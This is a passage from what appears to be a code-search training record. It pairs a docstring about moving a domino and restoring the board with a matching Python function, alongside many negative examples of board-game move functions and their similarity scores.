board.get_number_of_moves() == 1 or board.get_number_of_moves() == 2:\n if board.get_piece(1,1) == ' ':\n move = (1, 1)\n else:\n board_dimension = board.get_dimension()-1\n corners = [(0, 0), (0, board_dimension), (board_dimension, 0), (board_dimension, board_dimension)]\n corners = self.remove_filled_positions(corners, board)\n\n move = corners[randint(0, len(corners)-1)]\n else:\n move = self.check_for_winner(board)\n\n if move == (-1, -1):\n board_dimension = board.get_dimension()-1\n corner1_moves = self.remove_filled_positions([(0, 0), (2, 2)], board)\n corner2_moves = self.remove_filled_positions([(0, 2), (2, 0)], board)\n\n non_corner_moves = self.remove_filled_positions([(1, 0), (2, 1), (1, 2), (0, 1)], board)\n\n center_piece = board.get_piece(1, 1)\n corner_pieces = [board.get_piece(0, 0), board.get_piece(board_dimension, 0), board.get_piece(0, board_dimension), board.get_piece(board_dimension, board_dimension)]\n\n if corner_pieces[0] != self._piece and corner_pieces[0] != ' ' and corner_pieces[0] == corner_pieces[3]:\n move = non_corner_moves[randint(0, 3)]\n elif corner_pieces[1] != self._piece and corner_pieces[1] != ' ' and corner_pieces[1] == corner_pieces[2]:\n move = non_corner_moves[randint(0, 3)]\n elif len(corner2_moves) > 0 and corner_pieces[0] != self._piece and corner_pieces[0] == center_piece and corner_pieces[3] == self._piece:\n move = corner2_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[1] != self._piece and corner_pieces[1] == center_piece and corner_pieces[2] == self._piece:\n move = corner1_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[2] != self._piece and corner_pieces[2] == center_piece and corner_pieces[1] == self._piece:\n move = corner1_moves[0]\n elif len(corner2_moves) > 0 and corner_pieces[3] != self._piece and corner_pieces[3] == center_piece and corner_pieces[0] == self._piece:\n move = corner2_moves[0]\n else:\n move = self.can_complete_two_in_row(board)\n\n if move == (-1, -1):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def make_move(self, board: Board) -> int:\n raise NotImplementedError", "def move(state, pos, rel_pos):\n new_state = state.copy()\n return swap(new_state, pos, pos + rel_pos)", "def move(self, board):\n\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def _board_after_move_only(source, dest, board):\n new_board = deepcopy(board)\n x_old, y_old, x_new, y_new = source[0], source[1], dest[0], dest[1]\n new_board[x_new][y_new] = new_board[x_old][y_old]\n new_board[x_old][y_old] = 0\n return new_board", "def make_move(self, board: Block) -> int:\n raise NotImplementedError", "def move(direction: str, board : list) -> list:\n board_length = len(board)\n x, y = find_empty_space(board)\n \n increment_x = 0 \n increment_y = 0\n\n if direction == Direction.Up:\n increment_x, increment_y = Coordinate.Up.value\n elif direction == Direction.Down:\n increment_x, increment_y = Coordinate.Down.value\n elif direction == Direction.Left:\n increment_x, increment_y = Coordinate.Left.value\n elif direction == Direction.Right:\n increment_x, increment_y = Coordinate.Right.value\n\n x_new = x + increment_x\n y_new = y + increment_y\n\n is_valid = is_valid_move(x_new, y_new, board_length)\n\n if is_valid: \n temp = board[x][y]\n board[x][y] = board[x_new][y_new]\n board[x_new][y_new] = temp\n return board\n return None", "def make_move(self, board):\n user_input = self.get_user_input(\n 'coordinates of next move (x,y): '\n )\n move = self.transform_user_input(user_input)\n\n valid = board.move_is_valid(move)\n while not valid:\n user_input = self.get_user_input(\n 'Invalid move, coordinate of next move: '\n )\n move = self.transform_user_input(user_input)\n valid = board.move_is_valid(move)\n board.set_piece(move, color=self.color)", "def move(self, board):\n\n # We record all game positions to feed them into the NN for training with the corresponding updated Q\n # values.\n self.board_position_log.append(board.getState().copy())\n\n nn_input = self.board_state_to_nn_input(board.getState())\n probs, _ = self.get_valid_probs([nn_input], self.q_net, [board])\n probs = probs[0]\n # print(probs)\n # print(type(probs))\n # print(probs.shape)\n # input()\n # print(probs)\n # Most of the time our next move is the one with the highest probability after removing all illegal ones.\n # Occasionally, however we randomly chose a random move to encourage exploration\n if (self.training is True) and \\\n ((self.game_counter < self.pre_training_games) or (np.random.rand(1) < self.random_move_prob)):\n available = []\n for index in range(6):\n if probs[index] != -1.0:\n available.append(index)\n randomOne = random.randint(0,len(available)-1)\n move = available[randomOne]\n else:\n move = np.argmax(probs)\n # We record the action we selected as well as the Q values of the current state for later use when\n # adjusting NN weights.\n self.action_log.append(move)\n\n # We execute the move and return the result\n board.makeMove(move)\n return board.getState(), board.isOver()", "def make_move(self, move):\n if int(move) < 0 or int(move) > 48 or self.board[int(move) // 7][int(move) % 7] != \"\" or int(move) % 2 == 0:\n raise ValueError(\"{} is not a valid move for {}\".format(move, self.board))\n DotsAndBoxesState.score1 += self.check_score(move)\n self.board[int(move) // 7][int(move) % 7] = colors[self.turn] + self.turn + \"\\u001b[0m\"\n self.turn = get_opponent(self.turn) #change into another player's trun", "def make_move(self, move: Any) -> \"StonehengeState\":\n new_board = deepcopy(self.current_board)\n for index in range(len(self.current_board)):\n if self.current_board[index] == move:\n if self.p1_turn:\n new_board = new_board.replace(\n self.current_board[index], '1')\n else:\n new_board = new_board.replace(\n self.current_board[index], '2')\n new_ley_lines = deepcopy(self.current_ley_lines)\n for item in new_ley_lines:\n for key in item:\n for index in range(len(key[1])):\n if key[1][index] == move:\n if self.p1_turn:\n key[1][index] = '1'\n else:\n key[1][index] = '2'\n change_dict = {}\n for item in new_ley_lines:\n for key in item:\n p1_count = 0\n p2_count = 0\n for string in key[1]:\n if string == '1':\n p1_count += 1\n if string == '2':\n p2_count += 1\n\n\n if p1_count >= len(key[1])/2 and p1_count > p2_count:\n\n change_dict[key[0]] = '1'\n if p2_count >= len(key[1])/2 and p2_count > p1_count:\n\n change_dict[key[0]] = '2'\n for key in change_dict:\n if not (key == '1' or key == '2'):\n if str(key) in new_board:\n new_board = new_board.replace(str(key), change_dict[key])\n for item in new_ley_lines:\n for key1 in item:\n if key == key1[0]:\n key1[0] = change_dict[key]\n\n new_state = StonehengeState(not self.p1_turn, self.side_length,\n new_board, new_ley_lines)\n return new_state", "def domove(board, move):\n for m in getmovesfromoracle(board):\n if m['move'] == move:\n return(m['board'])\n return(None)", "def make_move(self, move, disc):\n column = move - 1\n board = self.game[\"board\"]\n # Check if this row is already full\n if board[column][0] != self.EMPTY:\n return None\n # Drop disc\n for idx, cell in enumerate(board[column]):\n if cell != self.EMPTY:\n row = idx - 1\n break\n else:\n row = idx\n board[column][row] = disc\n return (column, row)", "def make_move(self, move):\n self.board[int(move) - 1] = self.nplayer", "def move(state=None, actual_move=None):\n copy = state.copy()\n copy.push(chess.Move.from_uci(uci=actual_move))\n return copy", "def undo_move(self):\r\n if len(self.moveLog) != 0:\r\n move = self.moveLog.pop()\r\n self.board[move.sr][move.sc] = move.pieceMoved\r\n self.board[move.er][move.ec] = move.pieceCaptured\r\n self.turn_white = not self.turn_white\r\n\r\n # king pos\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.sr, move.sc)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.sr, move.sc)\r\n\r\n # enpassant\r\n if move.isEnpassantMove:\r\n self.board[move.er][move.ec] = \"--\"\r\n self.board[move.sr][move.ec] = move.pieceCaptured\r\n self.enpas_pos = (move.er, move.ec)\r\n\r\n # pawn x2\r\n if move.pieceMoved[1] == \"p\" and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ()\r\n\r\n # castle rights\r\n self.castleRightsLog.pop()\r\n self.cr_castle_r = self.castleRightsLog[-1]\r\n\r\n # castle moves\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 1]\r\n self.board[move.er][move.ec - 1] = '--'\r\n else:\r\n self.board[move.er][move.ec - 2] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'", "def make_move(self, move: Any) -> 'StonehengeState':\n if type(move) == str:\n new_state = StonehengeState(not self.p1_turn, self.side_length)\n # copy the board information from current state\n # make copy of current state information\n hori_lst_copy = []\n for lst in self.hori_lst:\n temp = []\n for item in lst:\n temp.append(item)\n hori_lst_copy.append(temp)\n left_lst_copy = []\n for lst in self.left_lst:\n temp = []\n for item in lst:\n temp.append(item)\n left_lst_copy.append(temp)\n right_lst_copy = []\n for lst in self.right_lst:\n temp = []\n for item in lst:\n temp.append(item)\n right_lst_copy.append(temp)\n\n hori_result_copy = []\n for item in self.hori_result:\n hori_result_copy.append(item)\n left_result_copy = []\n for item in self.left_result:\n left_result_copy.append(item)\n right_result_copy = []\n for item in self.right_result:\n right_result_copy.append(item)\n\n new_state.hori_lst = hori_lst_copy\n new_state.hori_result = hori_result_copy\n new_state.left_lst = left_lst_copy\n new_state.left_result = left_result_copy\n new_state.right_lst = right_lst_copy\n new_state.right_result = right_result_copy\n # update the new state with str move\n # parallel nested list data structure\n lst = [new_state.hori_lst, new_state.left_lst, new_state.right_lst]\n result = [new_state.hori_result, new_state.left_result, new_state.right_result]\n # update the cell\n for i in range(len(lst)):\n for j in range(len(lst[i])):\n for k in range(len(lst[i][j])):\n if lst[i][j][k] == move:\n # should use the player name of last state, so opposite names\n if new_state.p1_turn:\n lst[i][j][k] = \"2\"\n else:\n lst[i][j][k] = \"1\"\n # update ley-line marks\n # the ley-line may belong to a player after this move\n p1_taken = 0\n p2_taken = 0\n if result[i][j] != \"@\":\n continue\n for item in lst[i][j]:\n if item == \"1\":\n p1_taken += 1\n if item == \"2\":\n p2_taken += 1\n if float(p1_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"1\"\n if float(p2_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"2\"\n ###### CHECK FOR SHALLOW COPY PROBLEM, IF ATTRIBUTE IS UPDATE IN NEW STATE\n return new_state", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def moves(self, board_state):\n # pos_moves = generate_moves(board_state) # Naive moves function here\n blacks = board_state.search_board('B')\n # Generate the possible moves required to kill the first black piece\n # on the board\n pos_moves = sorted_generate_moves_piece(board_state, blacks[0])\n return pos_moves", "def make_move(move, player, board):\n board[move] = player\n for d in DIRECTIONS:\n Othello.make_flips(move, player, board, d)\n return board", "def result(self, board_state, move):\n # Create a copy of the current board state\n output_state = BoardState(other_state=board_state)\n # Swap pieces\n output_state.move_piece(move)\n # Eliminate pieces\n output_state.eliminate_piece()\n return output_state" ]
[ "0.7599279", "0.6890704", "0.6870524", "0.6765509", "0.6765455", "0.67173713", "0.6701276", "0.66965497", "0.66819054", "0.6667514", "0.6663559", "0.66578156", "0.66204715", "0.657253", "0.65490776", "0.6526394", "0.6526335", "0.6520004", "0.6495556", "0.6494918", "0.6452767", "0.6435724", "0.64350605", "0.64282227", "0.64204675", "0.64192647", "0.6402228", "0.6399187", "0.63986206", "0.637706" ]
0.7041228
1
Move a domino and calculate the new board state. Afterward, put the board back in its original state.
def move(self, domino, dx, dy, offset=None): matching_dominoes = set() complement_found = False domino.move(dx, dy) board = domino.head.board try: if not board.is_connected(): raise BadPositionError('Board is not connected after move.') for cell in (domino.head, domino.tail): for neighbour in cell.find_neighbours(): if neighbour.pips == cell.pips: matching_dominoes.add((neighbour.domino, neighbour.domino.head.x, neighbour.domino.head.y)) complement_found = (complement_found or neighbour.pips + cell.pips == 6) if matching_dominoes: matching_dominoes.add((domino, domino.head.x, domino.head.y)) elif not complement_found: raise BadPositionError( 'A legal move must have captures or complements.') for matching_domino, _, _ in matching_dominoes: board.remove(matching_domino) if not board.is_connected(): raise BadPositionError('Board is not connected after capture.') cropping_bounds = [] if offset is not None else None new_state = board.display(cropped=True, cropping_bounds=cropping_bounds) remaining = self.check_progress(board) if offset is not None: offset[0] -= cropping_bounds[0] offset[1] -= cropping_bounds[1] return new_state, remaining finally: for matching_domino, x, y in matching_dominoes: board.add(matching_domino, x, y) domino.move(-dx, -dy)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def move(self, domino, dx, dy) -> typing.Tuple[str, int]:\n domino.move(dx, dy)\n try:\n board = domino.head.board\n if not board.is_connected():\n raise BadPositionError('Board is not connected.')\n if board.has_loner():\n raise BadPositionError('Board has a lonely domino.')\n remaining = self.check_progress(board)\n return board.display(cropped=True), remaining\n finally:\n domino.move(-dx, -dy)", "def move(self, board):\n raise NotImplementedError", "def move(self, board):\n # first, make your turn:\n currentState = board[self.x,self.y]\n turnDir = self.rule[(currentState + 1) % len(self.rule)]\n self.turn( int(turnDir) )\n # next, let's change this cell's state:\n if currentState >= len(self.rule) - 1:\n board[self.x,self.y] = 0\n else:\n board[self.x,self.y] = currentState + 1\n # and let's move:\n offsets = self.nextPositionOffset() # based on x, y, and dir\n self.x, self.y = board.move(self.x, self.y, offsets[0], offsets[1])", "def domove(self, depart, arrivee, promote):\n\n # Debugging tests\n # if(self.cases[depart].isEmpty()):\n # print('domove() ERROR : asked for an empty square move : ',depart,arrivee,promote)\n # return \n # if(int(depart)<0 or int(depart)>63):\n # print('domove() ERROR : incorrect FROM square number : ',depart)\n # return \n # if(int(arrivee)<0 or int(arrivee)>63):\n # print('domove() ERROR : incorrect TO square number : ',arrivee)\n # return\n # if(not(promote=='' or promote=='q' or promote=='r' or promote=='n' or promote=='b')):\n # print('domove() ERROR : incorrect promote : ',promote)\n # return\n\n # Informations to save in the history moves\n pieceDeplacee = self.cases[depart] # moved piece\n piecePrise = self.cases[arrivee] # taken piece, can be null : Piece()\n isEp = False # will be used to undo a ep move\n histEp = self.ep # saving the actual ep square (-1 or square number TO)\n hist_roque_56 = self.white_can_castle_56\n hist_roque_63 = self.white_can_castle_63\n hist_roque_0 = self.black_can_castle_0\n hist_roque_7 = self.black_can_castle_7\n flagViderEp = True # flag to erase ep or not : if the pawn moved is not taken directly, it can't be taken later\n\n # Moving piece\n self.cases[arrivee] = self.cases[depart]\n self.cases[depart] = Piece()\n\n self.ply += 1\n\n # a PAWN has been moved -------------------------------------\n if (pieceDeplacee.nom == 'PION'):\n\n # White PAWN\n if (pieceDeplacee.couleur == 'blanc'):\n\n # If the move is \"en passant\"\n if (self.ep == arrivee):\n piecePrise = self.cases[arrivee + 8] # take black pawn\n self.cases[arrivee + 8] = Piece()\n isEp = True\n\n # The white pawn moves 2 squares from starting square\n # then blacks can take \"en passant\" next move\n elif (self.ROW(depart) == 6 and self.ROW(arrivee) == 4):\n self.ep = arrivee + 8\n flagViderEp = False\n\n # Black PAWN\n else:\n\n if (self.ep == arrivee):\n piecePrise = self.cases[arrivee - 8]\n self.cases[arrivee - 8] = Piece()\n isEp = True\n\n elif (self.ROW(depart) == 1 and self.ROW(arrivee) == 3):\n self.ep = arrivee - 8\n flagViderEp = False\n\n # a ROOK has been moved--------------------------------------\n # update castle rights\n\n elif (pieceDeplacee.nom == 'TOUR'):\n\n # White ROOK\n if (pieceDeplacee.couleur == 'blanc'):\n if (depart == 56):\n self.white_can_castle_56 = False\n elif (depart == 63):\n self.white_can_castle_63 = False\n\n # Black ROOK\n else:\n if (depart == 0):\n self.black_can_castle_0 = False\n elif (depart == 7):\n self.black_can_castle_7 = False\n\n # a KING has been moved-----------------------------------------\n\n elif (pieceDeplacee.nom == 'ROI'):\n\n # White KING\n if (pieceDeplacee.couleur == 'blanc'):\n\n # moving from starting square\n if (depart == 60):\n # update castle rights\n self.white_can_castle_56 = False\n self.white_can_castle_63 = False\n\n # If castling, move the rook\n if (arrivee == 58):\n self.cases[56] = Piece()\n self.cases[59] = Piece('TOUR', 'blanc')\n\n elif (arrivee == 62):\n self.cases[63] = Piece()\n self.cases[61] = Piece('TOUR', 'blanc')\n\n # Black KING\n else:\n\n if (depart == 4):\n self.black_can_castle_0 = False\n self.black_can_castle_7 = False\n\n if (arrivee == 6):\n self.cases[7] = Piece()\n self.cases[5] = Piece('TOUR', 'noir')\n\n elif (arrivee == 2):\n self.cases[0] = Piece()\n self.cases[3] = Piece('TOUR', 'noir')\n\n # End pieces cases-----------------------------------------------\n\n # Any move cancels the ep move\n if (flagViderEp == True):\n self.ep = -1\n\n # Promote : the pawn is changed to requested piece\n if (promote != ''):\n if (promote == 'q'):\n self.cases[arrivee] = Piece('DAME', self.side2move)\n elif (promote == 'r'):\n self.cases[arrivee] = Piece('TOUR', self.side2move)\n elif (promote == 'n'):\n self.cases[arrivee] = Piece('CAVALIER', self.side2move)\n elif (promote == 'b'):\n self.cases[arrivee] = Piece('FOU', self.side2move)\n\n # Change side to move\n self.changeTrait()\n\n # Save move to the history list\n self.history.append((depart, \\\n arrivee, \\\n pieceDeplacee, \\\n piecePrise, \\\n isEp, \\\n histEp, \\\n promote, \\\n hist_roque_56, \\\n hist_roque_63, \\\n hist_roque_0, \\\n hist_roque_7))\n\n # If the move lets king in check, undo it and return false\n if (self.in_check(self.oppColor(self.side2move))):\n self.undomove()\n return False\n\n return True", "def make_move(self, move, player, board):\r\n #nBoard = board.copy()\r\n board[move] = player\r\n for d in core.DIRECTIONS:\r\n if self.find_bracket(move, player, board, d)!=None:\r\n self.make_flips(move, player, board, d)\r\n return board", "def moved_board(board):\n return legal_move_on(board=board).map(\n lambda (start, end): board.move(start=start, end=end),\n )", "def make_move(self, state):\r\n # intially set drop phase to true\r\n drop_phase = True\r\n move = [] # list to make moves with to return\r\n succ = self.succ(state) # get the successor of this state\r\n # intial postion of board to set up most advantagous spot if its empty\r\n if sum(x.count(self.my_piece) for x in self.board) == 0 and self.board[2][2] == ' ':\r\n move.insert(0, (2, 2))\r\n return move\r\n \r\n # check the number of 'r' and 'b' on board if theres 4 of each drop phase is false\r\n if sum(x.count('r') for x in self.board) == 4 and sum(x.count('b') for x in self.board) == 4:\r\n drop_phase = False\r\n\r\n # if not during drop phase use minimax to make next move from one postion to next\r\n if not drop_phase:\r\n move = []\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n f = d['from']\r\n s = sorted(succ, key=lambda e: e['f'])\r\n moveto = s[-1]\r\n move.insert(1, (moveto['from'][0], moveto['from'][1]))\r\n move.insert(0, (moveto['pos'][0], moveto['pos'][1]))\r\n return move # return the from, to move\r\n\r\n else: #else use minimax and to make move during drop phase selecting spot to place AI piece\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n hold = []\r\n move = []\r\n n = None\r\n hold = []\r\n for s in succ:\r\n p = s['pos'][0]\r\n p1 = s['pos'][1]\r\n if s['f'] == val and state[p][p1] == ' ':\r\n hold.append(s)\r\n if len(hold) == 1:\r\n row = hold[0]['pos'][0]\r\n col = hold[0]['pos'][1]\r\n else:\r\n f = sorted(hold, key=lambda e: e['pos'])\r\n row = f[0]['pos'][0]\r\n col = f[0]['pos'][1]\r\n\r\n move.insert(0, (row, col)) # return the move \r\n return move", "def apply_move(self, move):\r\n next_board = copy.deepcopy(self.board)\r\n next_board.place(self.next_player, move)\r\n return GameState(next_board, self.next_player.other, move)", "def move(self, board):\n\n if board.get_number_of_moves() == 0:\n random_row = randint(0, 2)\n random_column = randint(0, 2)\n\n if random_row == 1 or random_column == 1:\n random_row = 1\n random_column = 1\n elif random_row == 2:\n random_row = board.get_dimension()-1\n\n if random_column == 2:\n random_column = board.get_dimension()-1\n\n move = (random_row, random_column)\n elif board.get_number_of_moves() == 1 or board.get_number_of_moves() == 2:\n if board.get_piece(1,1) == ' ':\n move = (1, 1)\n else:\n board_dimension = board.get_dimension()-1\n corners = [(0, 0), (0, board_dimension), (board_dimension, 0), (board_dimension, board_dimension)]\n corners = self.remove_filled_positions(corners, board)\n\n move = corners[randint(0, len(corners)-1)]\n else:\n move = self.check_for_winner(board)\n\n if move == (-1, -1):\n board_dimension = board.get_dimension()-1\n corner1_moves = self.remove_filled_positions([(0, 0), (2, 2)], board)\n corner2_moves = self.remove_filled_positions([(0, 2), (2, 0)], board)\n\n non_corner_moves = self.remove_filled_positions([(1, 0), (2, 1), (1, 2), (0, 1)], board)\n\n center_piece = board.get_piece(1, 1)\n corner_pieces = [board.get_piece(0, 0), board.get_piece(board_dimension, 0), board.get_piece(0, board_dimension), board.get_piece(board_dimension, board_dimension)]\n\n if corner_pieces[0] != self._piece and corner_pieces[0] != ' ' and corner_pieces[0] == corner_pieces[3]:\n move = non_corner_moves[randint(0, 3)]\n elif corner_pieces[1] != self._piece and corner_pieces[1] != ' ' and corner_pieces[1] == corner_pieces[2]:\n move = non_corner_moves[randint(0, 3)]\n elif len(corner2_moves) > 0 and corner_pieces[0] != self._piece and corner_pieces[0] == center_piece and corner_pieces[3] == self._piece:\n move = corner2_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[1] != self._piece and corner_pieces[1] == center_piece and corner_pieces[2] == self._piece:\n move = corner1_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[2] != self._piece and corner_pieces[2] == center_piece and corner_pieces[1] == self._piece:\n move = corner1_moves[0]\n elif len(corner2_moves) > 0 and corner_pieces[3] != self._piece and corner_pieces[3] == center_piece and corner_pieces[0] == self._piece:\n move = corner2_moves[0]\n else:\n move = self.can_complete_two_in_row(board)\n\n if move == (-1, -1):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def make_move(self, board: Board) -> int:\n raise NotImplementedError", "def move(state, pos, rel_pos):\n new_state = state.copy()\n return swap(new_state, pos, pos + rel_pos)", "def move(self, board):\n\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def _board_after_move_only(source, dest, board):\n new_board = deepcopy(board)\n x_old, y_old, x_new, y_new = source[0], source[1], dest[0], dest[1]\n new_board[x_new][y_new] = new_board[x_old][y_old]\n new_board[x_old][y_old] = 0\n return new_board", "def make_move(self, board: Block) -> int:\n raise NotImplementedError", "def move(direction: str, board : list) -> list:\n board_length = len(board)\n x, y = find_empty_space(board)\n \n increment_x = 0 \n increment_y = 0\n\n if direction == Direction.Up:\n increment_x, increment_y = Coordinate.Up.value\n elif direction == Direction.Down:\n increment_x, increment_y = Coordinate.Down.value\n elif direction == Direction.Left:\n increment_x, increment_y = Coordinate.Left.value\n elif direction == Direction.Right:\n increment_x, increment_y = Coordinate.Right.value\n\n x_new = x + increment_x\n y_new = y + increment_y\n\n is_valid = is_valid_move(x_new, y_new, board_length)\n\n if is_valid: \n temp = board[x][y]\n board[x][y] = board[x_new][y_new]\n board[x_new][y_new] = temp\n return board\n return None", "def make_move(self, board):\n user_input = self.get_user_input(\n 'coordinates of next move (x,y): '\n )\n move = self.transform_user_input(user_input)\n\n valid = board.move_is_valid(move)\n while not valid:\n user_input = self.get_user_input(\n 'Invalid move, coordinate of next move: '\n )\n move = self.transform_user_input(user_input)\n valid = board.move_is_valid(move)\n board.set_piece(move, color=self.color)", "def move(self, board):\n\n # We record all game positions to feed them into the NN for training with the corresponding updated Q\n # values.\n self.board_position_log.append(board.getState().copy())\n\n nn_input = self.board_state_to_nn_input(board.getState())\n probs, _ = self.get_valid_probs([nn_input], self.q_net, [board])\n probs = probs[0]\n # print(probs)\n # print(type(probs))\n # print(probs.shape)\n # input()\n # print(probs)\n # Most of the time our next move is the one with the highest probability after removing all illegal ones.\n # Occasionally, however we randomly chose a random move to encourage exploration\n if (self.training is True) and \\\n ((self.game_counter < self.pre_training_games) or (np.random.rand(1) < self.random_move_prob)):\n available = []\n for index in range(6):\n if probs[index] != -1.0:\n available.append(index)\n randomOne = random.randint(0,len(available)-1)\n move = available[randomOne]\n else:\n move = np.argmax(probs)\n # We record the action we selected as well as the Q values of the current state for later use when\n # adjusting NN weights.\n self.action_log.append(move)\n\n # We execute the move and return the result\n board.makeMove(move)\n return board.getState(), board.isOver()", "def make_move(self, move):\n if int(move) < 0 or int(move) > 48 or self.board[int(move) // 7][int(move) % 7] != \"\" or int(move) % 2 == 0:\n raise ValueError(\"{} is not a valid move for {}\".format(move, self.board))\n DotsAndBoxesState.score1 += self.check_score(move)\n self.board[int(move) // 7][int(move) % 7] = colors[self.turn] + self.turn + \"\\u001b[0m\"\n self.turn = get_opponent(self.turn) #change into another player's trun", "def make_move(self, move: Any) -> \"StonehengeState\":\n new_board = deepcopy(self.current_board)\n for index in range(len(self.current_board)):\n if self.current_board[index] == move:\n if self.p1_turn:\n new_board = new_board.replace(\n self.current_board[index], '1')\n else:\n new_board = new_board.replace(\n self.current_board[index], '2')\n new_ley_lines = deepcopy(self.current_ley_lines)\n for item in new_ley_lines:\n for key in item:\n for index in range(len(key[1])):\n if key[1][index] == move:\n if self.p1_turn:\n key[1][index] = '1'\n else:\n key[1][index] = '2'\n change_dict = {}\n for item in new_ley_lines:\n for key in item:\n p1_count = 0\n p2_count = 0\n for string in key[1]:\n if string == '1':\n p1_count += 1\n if string == '2':\n p2_count += 1\n\n\n if p1_count >= len(key[1])/2 and p1_count > p2_count:\n\n change_dict[key[0]] = '1'\n if p2_count >= len(key[1])/2 and p2_count > p1_count:\n\n change_dict[key[0]] = '2'\n for key in change_dict:\n if not (key == '1' or key == '2'):\n if str(key) in new_board:\n new_board = new_board.replace(str(key), change_dict[key])\n for item in new_ley_lines:\n for key1 in item:\n if key == key1[0]:\n key1[0] = change_dict[key]\n\n new_state = StonehengeState(not self.p1_turn, self.side_length,\n new_board, new_ley_lines)\n return new_state", "def domove(board, move):\n for m in getmovesfromoracle(board):\n if m['move'] == move:\n return(m['board'])\n return(None)", "def make_move(self, move, disc):\n column = move - 1\n board = self.game[\"board\"]\n # Check if this row is already full\n if board[column][0] != self.EMPTY:\n return None\n # Drop disc\n for idx, cell in enumerate(board[column]):\n if cell != self.EMPTY:\n row = idx - 1\n break\n else:\n row = idx\n board[column][row] = disc\n return (column, row)", "def make_move(self, move):\n self.board[int(move) - 1] = self.nplayer", "def move(state=None, actual_move=None):\n copy = state.copy()\n copy.push(chess.Move.from_uci(uci=actual_move))\n return copy", "def undo_move(self):\r\n if len(self.moveLog) != 0:\r\n move = self.moveLog.pop()\r\n self.board[move.sr][move.sc] = move.pieceMoved\r\n self.board[move.er][move.ec] = move.pieceCaptured\r\n self.turn_white = not self.turn_white\r\n\r\n # king pos\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.sr, move.sc)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.sr, move.sc)\r\n\r\n # enpassant\r\n if move.isEnpassantMove:\r\n self.board[move.er][move.ec] = \"--\"\r\n self.board[move.sr][move.ec] = move.pieceCaptured\r\n self.enpas_pos = (move.er, move.ec)\r\n\r\n # pawn x2\r\n 